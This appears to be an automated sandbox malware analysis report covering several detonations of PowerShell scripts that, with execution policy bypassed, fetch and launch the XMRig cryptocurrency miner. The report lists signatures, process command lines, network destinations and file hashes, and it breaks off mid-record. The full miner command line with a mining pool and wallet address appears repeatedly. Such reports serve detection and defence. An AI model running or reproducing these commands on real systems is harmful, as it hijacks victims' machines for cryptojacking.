Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 52.111.229.48:443 tcp
US 8.8.8.8:53 77.239.69.13.in-addr.arpa udp
US 8.8.8.8:53 155.83.221.88.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kyrcw1jt.njq.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral32

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 21:11

Platform

win11-20240426-en

Max time kernel

1798s

Max time network

1792s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 240.197.17.2.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bwrta3b3.h4a.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:35

Platform

win10v2004-20240426-en

Max time kernel

1794s

Max time network

1787s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bduobymj.urz.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral31

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 21:11

Platform

win10v2004-20240508-en

Max time kernel

1790s

Max time network

1784s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_w2oo0nww.pbp.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral24

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:53

Platform

win11-20240426-en

Max time kernel

1789s

Max time network

1792s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 79.239.69.13.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mqsajev1.0d4.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral26

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 21:11

Platform

win10-20240404-en

Max time kernel

1790s

Max time network

1798s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 92.16.208.104.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 249.197.17.2.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 56.94.73.104.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_z3v4z2hv.vqz.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral29

Detonation Overview

Submitted: 2024-05-22 20:05
Reported: 2024-05-22 21:11
Platform: win7-20240215-en
Max time kernel: 1561s
Max time network: 1562s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Network

N/A

Files

Analysis: behavioral18

Detonation Overview

Submitted: 2024-05-22 20:05
Reported: 2024-05-22 20:40
Platform: win10-20240404-en
Max time kernel: 1798s
Max time network: 1750s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 168.253.116.51.in-addr.arpa udp
US 8.8.8.8:53 37.56.20.217.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s5u4du1l.k4p.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral6

Detonation Overview

Submitted: 2024-05-22 20:05
Reported: 2024-05-22 20:36
Platform: win10-20240404-en
Max time kernel: 1794s
Max time network: 1779s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 2.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 249.197.17.2.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rmo2zc4b.eef.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral7

Detonation Overview

Submitted: 2024-05-22 20:05
Reported: 2024-05-22 20:36
Platform: win10v2004-20240426-en
Max time kernel: 1798s
Max time network: 1776s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
